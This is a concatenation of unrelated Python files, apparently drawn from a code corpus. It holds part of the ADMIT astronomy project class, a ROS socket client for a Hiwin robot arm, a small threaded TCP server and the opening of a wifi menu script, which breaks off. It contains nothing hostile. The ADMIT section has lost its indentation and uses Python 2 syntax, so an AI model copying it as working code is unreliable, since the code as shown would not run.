"#\n"
"import os, sys\n"
"import admit\n\n"
"# Command line processing.\n"
"argv = admit.utils.casa_argv(sys.argv)\n"
"if len(argv) < 2:\n"
" cubefile = '%s'\n"
" projdir = '%s'\n"
"else:\n"
" cubefile = argv[1]\n"
" projdir = os.path.splitext(argv[1])[0] + '.admit'\n\n"
"# Master project.\n"
"p = admit.Project(projdir, commit=False)\n"
% (self[tcube].getkey('file'), dirs[1]))
else:
tcube = None
py.write("import admit\n\n"
"# Master project.\n"
"p = admit.Project('%s', commit=False)\n" % (dirs[1]))
self.pm.script(py, self.dir())
self.fm.script(py, tcube=tcube)
py.write("\n# Update project.\n"
"p.run()\n")
py.close()
os.chmod(pyfile, 0o755);
def show(self):
""" Prints project state.
Parameters
----------
None
Returns
-------
None
Notes
-----
Currently only display FlowManager contents.
"""
print "==== ADMIT(%s) ====" % (self.name)
self.fm.show()
def browse(self):
"""Open a web browser tab with the URL of this admit project"""
try:
webbrowser.open_new_tab(url=self._data_url)
except Exception, e:
logging.warning("Couldn't open URL '%s' because %s" % (self._data_url,e))
def showsetkey(self, outfile=None):
""" Show current keys for tasks
For now on screen, but meant to aid writing a template file for rerun
Parameters
----------
outfile : str
The name of the output file
Returns
-------
None
"""
self.fm.showsetkey(outfile)
def set(self, **kwargs):
""" Sets keys and values in userData.
Parameters
----------
kwargs : dictionary like
Command line arguments for the function, can be a=x,b=y or
\*\*{a:x, b:y} format
Returns
-------
None
"""
self.userData.update(kwargs)
def check(self):
""" Check all project BDPs for name collisions.
Also identifies orphaned branches of the tree.
A topological sort is needed as well, if they are not in the correct
execution order.
See Also
--------
UNIX tsort(1) program.
"""
pass
def get(self, key):
"""Get a global ADMIT parameter.
Parameters
----------
key : str
User-defined data keyword.
Returns
-------
str
User-defined (userData) keyword value.
Notes
-----
.. todo::
This method should mirror the way we do this in the AT
(setkey/getkey)
"""
if key in self.userData:
return self.userData[key]
else:
print "ADMIT: %s not a valid userData key" % key
def has(self, key):
"""Query if a global user key exists for this admit project.
Parameters
----------
key : str
User-defined data keyword.
Returns
-------
bool
True if keyword is present in userData, else False.
"""
return key in self.userData
def print_methods(self):
""" Print all the methods of this object and their doc string(s).
Parameters
----------
None
Returns
-------
None
"""
print '\n* Methods *'
for names in dir(self):
attr = getattr(self, names)
if callable(attr):
print names, ':', attr.__doc__
def print_attributes(self):
""" Print all the attributes of this object and their value(s).
Parameters
----------
None
Returns
-------
None
"""
print '* Attributes *'
for names in dir(self):
attr = getattr(self, names)
if not callable(attr):
print names, ':', attr
def print_all(self):
""" Calls all the methods of this object.
Parameters
----------
None
Returns
-------
None
"""
for names in dir(self):
attr = getattr(self, names)
if callable(attr) and names != 'print_all' and names != '__init__':
attr() # calling the method
def discover(self, mode=None, rootdir='.'):
"""Project data discovery.
Parameters
----------
mode : TBD
Discovery mode.
rootdir : str, optional
Search root directory.
Returns
-------
list
Search results.
"""
print "query_dir() and find_files() are the worker functions"
print "discover not implemented yet"
pp = []
return pp
#def query_dir(self,here=None):
# """
# Drill down and find directories in which ADMIT exists.
# Parameters
# ----------
# here : str, optional
# Directory to begin search; defaults to current directory.
# Returns
# -------
# list
# Search results.
# """
# dlist = []
# if here == None:
# path = "."
# else:
# path = here
# n = 0
# for path, dirs, files in os.walk(path):
# # better not to loop, but os.path() for existence
# n = n + 1
# for f in files:
# if f == self.parfile: dlist.append(path)
# logging.debug("Queried " + str(n) + " directories, found " +
# str(len(dlist)) + " with a parfile")
# return dlist
def find_bdp(self):
"""Find all bdp's in the current admit.
Parameters
----------
None
Returns
-------
list
All \*.bdp files within the admit hierarchy.
"""
len1 = len(self.dir())
matches = []
for root, dirnames, filenames in os.walk(self.dir()):
for filename in fnmatch.filter(filenames, '*.bdp'):
matches.append(os.path.join(root, filename)[len1:])
#print "BDPs:",matches
return matches
def find_files(self, pattern="*.fits"):
"""
Find files containing a wildcard pattern.
Parameters
----------
pattern : str, optional
File name wildcard pattern.
Returns
-------
list
File names matching the pattern.
"""
#@todo this should call util.find_files instead.
flist = []
for filename in os.listdir('.'):
if fnmatch.fnmatch(filename, pattern):
flist.append(filename)
return flist
def setdir(self, dirname, create=True):
"""
Changes current working directory. The directory is
        assumed to contain a parameter file.
.. note:: Deprecated.
See pushd()/popd() for a better version.
Parameters
----------
dirname : str
Directory to work in.
create : bool, optional
Whether to create the directory if it doesn't exist.
Notes
-----
.. todo::
the new mkdir() and self.baseDir are the way to work in ADMIT
"""
def mkdir_p(path):
#if not os.path.isdir(dirname):
# os.makedirs(dirname)
#
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
self.p = dirname
self.pwd = os.getcwd()
if create:
mkdir_p(dirname)
os.chdir(dirname)
logging.debug("ADMIT::setdir %s" % dirname)
def tesdir(self):
"""
Revert back from previous setdir (not recursive yet).
.. note:: Deprecated.
See pushd()/popd() for a better version.
"""
os.chdir(self.currDir)
#def walkdir(self,dlist):
# """Walks through directory list, printing what it finds
# Parameters
# ----------
# dlist : list of str
# Directory names to traverse.
# Returns
# -------
# None
# """
# print "Walkdir ", dlist
# for d in dlist:
# self.setdir(d)
# print "d: ", d
# par = pp.ParFile()
# print par.get('fits')
# print par.keys()
# self.tesdir()
def read(self):
"""Reads a project.
Notes
-----
Not implemented.
"""
pass
def export(self, mode):
"""
Prepare Admit for (archive) export. This means it has to loop over the BDP's
and decide which items are going to copied over to admit.userData{}, as admit.xml
is the only file external agents should have to look at.
See also the script "admit_export" which is currently doing this work.
Parameters
----------
mode : str
Export mode.
Returns
-------
None
Notes
-----
Not implemented.
"""
print "Export: ", mode
def write(self):
""" Writes out the admit.xml file, admit0.py script and
project html files.
Parameters
----------
None
Returns
-------
None
"""
self.writeXML()
self.updateHTML()
def writeXML(self, script = True):
""" Writes out the admit.xml file and admit0.py script.
Reading the XML file occurs in the constructor.
Parameters
----------
None
Returns
-------
None
"""
# For multiflows, rewrite parent project XML files in case
# any linked tasks were updated.
self.pm.write()
# get the dtd files, which acts as a guide
dtdRead = DtdReader("admit.dtd")
dtd = dtdRead.getDtd()
dtdlist = {}
# create the root node
root = et.Element("ADMIT")
# write out the each data member
unode = et.SubElement(root, "userData")
unode.set("type", bt.DICT)
nd = []
st = []
attr = copy.deepcopy(self.userData)
for k, v in attr.iteritems():
if isinstance(v, np.ndarray):
nd.append(k)
attr[k] = np.ndarray.tolist(v)
elif isinstance(v, set):
st.append(k)
attr[k] = list(v)
unode.set("ndarray", str(nd))
unode.set("set", str(st))
temptext = str(attr)
tt = ""
tlist = textwrap.wrap(temptext, width=10000)
for l in tlist:
tt += l + "\n"
unode.text = tt
# write out the summary data
self.summaryData.write(root)
pnode = et.SubElement(root, "project_id")
pnode.set("type", bt.INT)
pnode.text = str(self.project_id)
nnode = et.SubElement(root, "name")
nnode.set("type", bt.STRING)
temptext = self.name
tt = ""
tlist = textwrap.wrap(temptext, width=10000)
for l in tlist:
tt += l + "\n"
nnode.text = tt
fnode = et.SubElement(root, "flowmanager")
fnode.set("type", bt.DICT) #HERE
attr = copy.deepcopy(self.fm)
pmnode = et.SubElement(root, "pmode")
pmnode.set("type", bt.INT)
pmnode.text = str(self.pmode)
ptnode = et.SubElement(root, "ptype")
ptnode.set("type", bt.INT)
ptnode.text = str(self.ptype)
llnode = et.SubElement(root, "loglevel")
llnode.set("type", bt.INT)
llnode.text = str(self.loglevel)
llnode = et.SubElement(root, "astale")
llnode.set("type", bt.INT)
llnode.text = str(self.astale)
lnnode = et.SubElement(root, "_loggername")
lnnode.set("type", bt.STRING)
temptext = self._loggername
tt = ""
tlist = textwrap.wrap(temptext, width=10000)
for l in tlist:
tt += l + "\n"
lnnode.text = tt
fnode.set("ndarray", str([]))
fnode.set("set", str([]))
tasks = {} # make a simplified version of the connection map for writing out, it will be reconstructed on read in
for tid in self.fm:
tasks[tid] = None
temptext = str({"connmap" : self.fm._connmap,
"bdpmap" : self.fm._bdpmap,
"depsmap" : str(self.fm._depsmap),
"varimap" : str(self.fm._varimap),
"tasklevs": self.fm._tasklevs,
"tasks" : tasks})
tt = ""
tlist = textwrap.wrap(temptext, width=10000)
for l in tlist:
tt += l + "\n"
fnode.text = tt
pmnode = et.SubElement(root, "projmanager")
pmnode.set("type", bt.DICT)
pmnode.set("ndarray", str([]))
pmnode.set("set", str([]))
temptext = str(self.pm._baseDirs)
tt = ""
tlist = textwrap.wrap(temptext, width=10000)
for l in tlist:
tt += l + "\n"
pmnode.text = tt
#print 'Flow',fnode.text
for tid in self.fm:
root, tdtd = self.fm[tid].write(root)
dtdlist[self.fm[tid]._type] = tdtd
# generate a string from the nodes
rough_string = et.tostring(root, 'utf-8')
# make the text human readable
temp = rough_string.replace(">", ">\n")
temp = temp.replace("</", "\n</")
# open the output file
outFile = open(self.baseDir + "admit.xml", 'w')
# write out the header
outFile.write("<?xml version=\"1.0\" ?>\n")
# write out the dtd info at the top
outFile.write("<!DOCTYPE ADMIT [\n\n")
for line in dtd:
outFile.write(line)
for d in dtdlist:
for l in dtdlist[d]:
outFile.write(l)
outFile.write("]>\n\n")
# write out the data
outFile.write(temp)
outFile.close()
if script:
# Don't name script 'admit.py' to avoid confusing 'import admit'.
self.script(self.dir() + 'admit0.py')
def clean(self):
""" Method to delete orphan bdp's (files and underlying data)
Parameters
----------
None
Returns
-------
None
"""
files = utils.getFiles(self.dir())
for task in self.fm._tasks.values():
delfiles = []
for bdp in task._bdp_out:
if bdp is None:
continue
for i, file in enumerate(files):
if file.endswith(bdp.xmlFile + ".bdp"):
delfiles.append(i)
delfiles.sort()
delfiles.reverse()
for d in delfiles:
del files[d]
for file in files:
bdp = utils.getBDP(file)
print "DELETING",bdp.xmlFile
bdp.delete()
del bdp
def startDataServer(self):
"""Starts the data HTTP server.
On a separate thread, start the http server on localhost:_data_browser_port
that will allow web browsing of data products. Also attempt
to open a browser window at that URL. When this method returns,
the variable self._data_browser_port will have the value of
the port returned by the OS.
See util.AdmitHTTP.AdmitHTTPServer
Parameters
----------
None
Returns
-------
None
"""
if self._server != None:
print "A data server for this Admit object is already running on localhost:%d" % self._data_browser_port
return
server_address = ("localhost", self._data_browser_port)
try:
self._server = admit.util.AdmitHTTP.AdmitHTTPServer(server_address, docroot=self.baseDir, postcallback = self._onpost )
self._data_browser_port = self._server.server_address[1]
except:
print "Failed to get a port for the data browser."
return
threadName = "%s:%d" % (self.baseDir, self._data_browser_port)
thread = threading.Thread(name=threadName, target=self._serveforever, args=())
thread.setDaemon(True)
thread.start()
# create the attribute but we don't wish to save it in admit.xml
self._data_url = 'http://localhost:%d' % self._data_browser_port
print "Your data server is started on %s. Attempting to open a browser page with that URL. \nThe data server will halt when you quit your CASA session or otherwise destroy this ADMIT object." % self._data_url
# open page in new tab if possible
self.browse()
def url(self):
"""Print the URL for the data browser
Parameters
----------
None
Returns
-------
String representing localhost url on which data can be viewed.
"""
return self._data_url
    def export(self, level=0, casa=True, fits=False, out=None):
        """Export this Project to a gzipped tar file (stub; overrides export(mode) above)."""
        if out == None: out = self._defaulttarfile()
def _defaulttarfile(self):
"""return an export file name baseDir.tar.gz for this project
"""
return self.baseDir+".tar.gz" # option for ZIP?
#def runqueue(self):
# try:
# print "callback queue get"
# callback = self.queue.get(False)
# except Queue.Empty:
# pass
# print "got"
# callback()
def _onpost(self, payload):
"""This is the callback function when a user edits ADMIT key words
via form.html. It will cycle through the tasks and call setkeys,
then call admit.run().
Parameters
----------
payload: dict
The data coming from the server.
Returns
-------
None (maybe should return boolean if something failed?)
Notes
-----
Should not be called directly.
"""
#@todo: make this method a dictionary of methods?
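        # Illustrative payload shape, inferred from the handling below (the task
        # keyword "numsigma" is a hypothetical AT key):
        #   {"command": "run", "firefox": False,
        #    "task": [{"taskid": "3", "numsigma": "5.0"}]}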
command = payload["command"]
logging.info("Got command %s from browser" % command)
if command == "run":
#print "got command run"
try:
for t in payload['task']:
taskid = int(t["taskid"])
for key in t:
# skip the hidden form inputs, which are only to
# sort out what task this is, and any other non-matching keys
if not self.fm[taskid].haskey(key):
continue
# Everything coming back from the web form is unicode.
# ast.literal_eval solves this, except for strings!
# (which would need nested quotes).
# So first decode the value to a string. We don't need to
# decode the key to a string because python dictionaries
# with support unicode key access.
value_enc = t[key].encode('utf8')
# Then do type-checking
# of the AT's key to decide whether to invoke ast.literal_eval.
# Note this may also be useful if the web form serialization
# is ever upgraded to preserve types (requires use of :types
# in form)
# See https://github.com/marioizquierdo/jquery.serializeJSON
#print "key=%s, val=%s type:%s" % (key,t[key],type(t[key]))
if type(value_enc) == type(self.fm[taskid]._keys[key]):
#print "straight setkey"
self.fm[taskid].setkey(key,value_enc)
else:
#print "AST key=%s, val=%s" % (key,ast.literal_eval(t[key]) )
self.fm[taskid].setkey(key,ast.literal_eval(t[key]))
except Exception, e:
print "Bummer, got exception %s" % e
traceback.print_exc()
return
try:
logging.info("Re-running admit...")
print "[you may have hit return here]"
#self.queue.put(self.run)
#self.runqueue()
os.kill(self._pid,signal.SIGUSR1)
#self.run(write=True)
#formurl = self._data_url+"/form.html"
#webbrowser.open(url=formurl,new=0)
if payload["firefox"] == True:
#print "Damn you, Firefox!"
formurl = self._data_url+"/form.html"
webbrowser.open(url=formurl,new=0)
return
except Exception, e:
print "got exception on run %s" % e
traceback.print_exc()
elif command == "dryrun":
try:
for t in payload['task']:
taskid = int(t["taskid"])
for key in t:
# skip the hidden form inputs, which are only to
# sort out what task this is, and any other non-matching keys
if not self.fm[taskid].haskey(key):
continue
value_enc = t[key].encode('utf8')
if type(value_enc) == type(self.fm[taskid]._keys[key]):
#print "straight setkey"
self.fm[taskid].setkey(key,value_enc)
else:
#print "AST key=%s, val=%s" % (key,ast.literal_eval(t[key]) )
self.fm[taskid].setkey(key,ast.literal_eval(t[key]))
# update all downstream stale flags, so that they
# get marked in the HTML file.
self.fm.connectInputs()
except Exception, e:
print "Bummer, got exception %s" % e
traceback.print_exc()
return
try:
#self.fm.dryrun()
self.write()
if payload["firefox"] == True:
#print "damn you, Firefox!"
formurl = self._data_url+"/form.html"
webbrowser.open(url=formurl,new=0)
return
except Exception, e:
print "got exception on dryrun %s" % e
traceback.print_exc()
return
elif command == "linelistbdp":
try:
taskid = payload["taskid"]
# replace the data in the Linelist bdp table
llbdp = self.fm[taskid]._bdp_out[0]
# this is an array of LineData objects
llbdp.table.data = np.array([], dtype=object)
rows = payload["rows"]
# @TODO the spectral image may no longer be correct,
# if we are forcing or rejecting lines
for t in rows:
if t['disposition'] != 'reject':
#print 'keeping %s' % t['uid']
# add the columns in order as a single array.
# Note the contents of t[] are all unicode strings so
# we have to convert to regular strings and floats
# as appropriate
#print float(t["frequency"]), t["uid"].encode("utf8"), t["formula"].encode("utf8"), t["name"].encode("utf8"), t["transition"].encode("utf8"), float(t["velocity_raw"]), float(t["elower"]), float(t["eupper"]), float(t["linestrength"]), float(t["peakintensity_raw"]), float(t["peakoffset_raw"]), float(t["fwhm_raw"]), t["startchan"], t["endchan"], float(t["peakrms"]), t["blend"]
llbdp.addRow(LineData(
frequency=float(t["frequency"]),
uid=t["uid"].encode("utf8"),
formula=t["formula"].encode("utf8"),
name=t["name"].encode("utf8"),
transition=t["transition"].encode("utf8"),
velocity=float(t["velocity_raw"]),
energies=[float(t["elower"]), float(t["eupper"])],
linestrength=float(t["linestrength"]),
peakintensity=float(t["peakintensity_raw"]),
peakoffset=float(t["peakoffset_raw"]),
fwhm=float(t["fwhm_raw"]),
chans=[ float(t["startchan"]), float(t["endchan"])],
peakrms=float(t["peakrms"]),
blend=int(t["blend"])))
llbdp.write(self.dir()+llbdp.xmlFile)
# all tasks following LineID_AT are now stale.
self._markstalefrom(taskid)
# replace the data table in the summary
titems = self.summaryData.getItemsByTaskID(taskid);
the_item = titems.get('linelist',None)
if the_item != None:
the_item.getValue()[0] = llbdp.table.serialize()
self.write()
except Exception, e:
print "got exception on LineList_BDP write: %s" % e
traceback.print_exc()
return
elif command == "view":
#print "got command view"
try:
fullpath = str(self.dir()+payload["filename"])
logging.info("Opening file: %s" % fullpath)
import casa
axes = {'x':'x','y':'y','z':'z'}
casa.imview(raster=fullpath,axes=axes)
except Exception, e:
print "got exception on viewer launch: %s" % e
traceback.print_exc()
return
elif command == "forcereject":
taskid = payload["taskid"]
rows = payload["rows"]
#if "uuid" in payload:
# uid = payload["uuid"]
#else:
# print "couldn't find uuid"
# uid=None
# @TODO the spectral image may no longer be correct,
# if we are forcing or rejecting lines
# these are a lists of tuples
currentforce = self.fm[taskid].getkey('force')
currentreject = self.fm[taskid].getkey('reject')
# we append the submitted force/reject to the existing keyword
for t in rows:
if t['disposition'] == 'force':
currentforce.append( (float(t["frequency"]), t["uid"].encode("utf8"), t["formula"].encode("utf8"),\
t["name"].encode("utf8"), t["transition"].encode("utf8"), \
float(t["velocity_raw"]), float(t["startchan"]), float(t["endchan"])))
elif t['disposition'] == 'reject':
if t['frequency'].encode('utf8') == "None":
currentreject.append((t['name'].encode('utf8'), None))
else:
currentreject.append((t['name'].encode('utf8'), float(t['frequency'])))
else: # for 'accept' do nothing
continue
# remove duplicates
currentforce = list(set(currentforce))
currentreject = list(set(currentreject))
self.fm[taskid].setkey('force',currentforce)
self.fm[taskid].setkey('reject',currentreject)
self._markstalefrom(taskid)
# in this case the root task is also stale
self.fm[taskid].markChanged()
if len(currentforce) != 0:
logging.info("Set force = %s for task %d" % (self.fm[taskid].getkey('force'),taskid))
if len(currentreject) != 0:
logging.info("Set reject = %s for task %d" % (self.fm[taskid].getkey('reject'),taskid))
self.writeXML()
# don't rewrite the lineIDeditor file because we just want to update the JSON
# and not lose the user's edits
#if uid == -1 or uid == '-1': uid = None
self.summaryData.html(self.dir(), self.fm, self._dotdiagram(), False)
self.atToHTML()
self.logToHTML()
elif command == "exportfits":
try:
casaimage = self.dir(str(payload["casaimage"]))
fitsimage = self.dir(str(payload["fitsimage"]))
logging.info("exporting CASA image %s to FITS %s" % (casaimage,fitsimage))
# @todo add a checkbox or something to html to select overwrite
# this requires some customization of the input tag, e.g.
#http://duckranger.com/2012/06/pretty-file-input-field-in-bootstrap/
#http://www.abeautifulsite.net/whipping-file-inputs-into-shape-with-bootstrap-3/ [bootstrap 3 only]
#http://stackoverflow.com/questions/11235206/twitter-bootstrap-form-file-element-upload-button
import casa
casa.exportfits(casaimage,fitsimage,overwrite=False)
except Exception, e:
print "got exception on exportfits: %s" % e
traceback.print_exc()
return
else:
print "Unrecognized command %s" % command
def _dotdiagram(self):
"""Returns the default dot diagram file name.
Parameters
----------
None
"""
return self.dir()+'admit.png'
def _markstalefrom(self,taskid):
"""Mark as stale all tasks downstream from given taskid, not including
the root task.
Parameters
----------
taskid: int
The task ID of the root task.
Returns
-------
None
"""
nowstale = self.fm.downstream(taskid)
for tid in nowstale:
# don't mark the root LineID_AT as stale
if tid == taskid:
continue
            # but mark all its children as stale
self.fm[tid].markChanged()
def _serveforever(self):
"""
Method passed to thread by startDataServer.
Notes
-----
Should not be called directly.
"""
self._server.serve_forever()
def setAstale(self, astale, verbose=False, dryrun = False):
"""
Method to toggle the stale flags on all tasks based on a global admit stale
for the sole purpose of admit_export to work. It is dangerous to call this
routine when not all tasks are either stale or not stale.
        This function needs to be called with True first, so that it backs up the
        per-task stale flags; the second call, with False, pushes that backup back.
@todo This is a patch solution for admit 1.1 - general solution needed
"""
cnt0 = len(self.fm._tasks.keys())
cnt1 = 0 # stale
cnt2 = 0 # running? (if it did, those crashed)
cnt3 = 0 # enabled
if astale:
self.old = {}
for t in self:
if self[t].isstale(): cnt1 += 1
if self[t].running(): cnt2 += 1
if self[t].enabled(): cnt3 += 1
if astale:
self.old[t] = self[t].isstale()
if dryrun:
print "ADMIT_STALE: %d/%d were stale ; %d running, %d enabled, current setting is %d" % (cnt1,cnt0,cnt2,cnt3,self.astale)
return
if verbose:
print "ADMIT_STALE: %d/%d were stale ; setting to %d" % (cnt1,cnt0,astale)
if astale:
self.astale = 1
for t in self:
self[t].markChanged()
else:
self.astale = 0
for t in self:
if self.old[t]:
self[t].markChanged()
else:
self[t].markUpToDate()
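    # Illustrative usage sketch (not part of the original code; only the call
    # pairing is shown, the export step in between is an assumption):
    #   a.setAstale(True)    # back up each task's stale flag and mark all tasks stale
    #   ...run the export / tar step...
    #   a.setAstale(False)   # restore the backed-up per-task stale flags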
if __name__ == "__main__":
print "MAIN not active yet, but this is where it will go"
|
Hiwin_RT605_ArmCommand_Socket_20190628090524.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
## multithreading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcm_2d as TCP
import HiwinRA605_socket_Taskcmd_2 as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
#Socket = 0
#data = '0' # initial value of the transmitted data
Arm_feedback = 1 # assume the arm is busy
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
        return  # simply end the generator; raising StopIteration here is an error under PEP 479 (Python 3.7+)
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
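# Illustrative usage sketch (not part of the original code): Socket_command()
# below drives this switch emulation with the usual for/if pattern, e.g.
#   for case in switch(value):
#       if case(Taskcmd.Action_Type.PtoP):
#           ...   # handle point-to-point motion
#           break
#       if case():        # default branch, taken when no case() matched
#           break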
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
class client():
def __init__(self):
#self.get_connect()
pass
def get_connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(('192.168.0.1', 8080))
def send(self, msg):
        self.s.send(msg.encode('utf-8')) # encode with utf-8; other encodings exist, but utf-8 is fine for str
def get_recieve(self):
        data = self.s.recv(1024) # 1024 sets the buffer size, limiting how much is received at once
data.decode('utf-8')
return data
def close(self):
self.s.close()
Socket = client()
def point_data(x,y,z,pitch,roll,yaw): ## receive pose data sent from the strategy side
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ## receive arm-mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ## receive arm speed-mode data sent from the strategy side
socket_cmd.Speedmode = speedmode
def socket_talker(): ## create the server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##---------- socket packet transmission --------------##
##--------------- send arm commands over socket -----------------
def Socket_command():
global Socket
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
        #------- set arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
        #------- set arm Delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
        #------- set arm rapid & safe speed mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
    socket_cmd.action= 6 ## reset to the initial mode state
print(data)
print("Socket:", Socket)
    #Socket.send(data.encode('utf-8'))# socket send, for python to translate str
Socket.send(data)
##-----------socket client--------
def socket_client():
global Socket
try:
#Socket = client()
Socket.get_connect()
#Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
Socket_feedback(Socket)
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
Socket = s
while 1:
feedback_str = Socket.get_recieve()
        # the arm side reports the arm state
        if str(feedback_str[2]) == '48':# F: the arm is Ready and can accept the next motion command
state_feedback.ArmState = 0
        if str(feedback_str[2]) == '49':# T: the arm is busy and cannot execute the next motion command
state_feedback.ArmState = 1
        if str(feedback_str[2]) == '54':# 6: the strategy has finished
state_feedback.ArmState = 6
print("shutdown")
        # check the sent flag
        if str(feedback_str[4]) == '48':# returns 0, false
state_feedback.SentFlag = 0
        if str(feedback_str[4]) == '49':# returns 1, true
state_feedback.SentFlag = 1
        ##--------------- send arm commands over socket: end -----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##------------- socket packet transmission: end --------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 6## reset to the initial mode state
    ## multithreading
t = threading.Thread(target=socket_client)
    t.start() # start the thread
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
    ## multithreading end
|
server-tcp.py
|
import socket
import threading
bind_ip = ""
bind_port = 60007
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
print("[*] Listening on %s:%d" % (bind_ip, bind_port))
def handle_client(client_socket):
request = client_socket.recv(1024).decode()
print("[*] Received: %s" % request)
send_data = "ACK!"
client_socket.send(send_data.encode())
print(client_socket.getpeername())
client_socket.close()
while True:
client, addr = server.accept()
print("[*] Accepted connect from: %s:%d" % (addr[0], addr[1]))
client_handler = threading.Thread(target=handle_client, args=(client,))
client_handler.start()
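# Illustrative client sketch (not part of the original script; the host and
# port below are assumptions matching the server defaults above):
#   import socket
#   c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   c.connect(("127.0.0.1", 60007))
#   c.send(b"hello")
#   print(c.recv(1024))   # expect b"ACK!"
#   c.close()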
|
wifi_setup.py
|
import os
import imp
import sys
import time
import threading
# usb or sd card
user_dir = os.getenv("USER_DIR", "/usbdrive")
# imports
current_dir = os.path.dirname(os.path.abspath(__file__))
og = imp.load_source('og', current_dir + '/og.py')
wifi = imp.load_source('wifi_control', current_dir + '/wifi_control.py')
wifi.log_file = user_dir + "/wifi_log.txt"
# UI elements
menu = og.Menu()
banner = og.Alert()
# lock for updating menu
menu_lock = threading.Lock()
def quit():
og.end_app()
# stores possible networks
# used to build wifi menu
# contains connect callback
class WifiNet :
ssid = ''
pw = ''
def connect (self):
wifi.connect(self.ssid, self.pw)
update_menu()
og.redraw_flag = True
def disconnect():
print "wifi disconnect all"
wifi.disconnect_all()
update_menu()
og.redraw_flag = True
def start_web():
print "start web"
wifi.start_web_server()
update_menu()
og.redraw_flag = True
def stop_web():
print "stop web"
wifi.stop_web_server()
update_menu()
og.redraw_flag = True
def start_ap():
print "start ap"
wifi.start_ap_server()
update_menu()
og.redraw_flag = True
def stop_ap():
print "stop ap"
wifi.stop_ap_server()
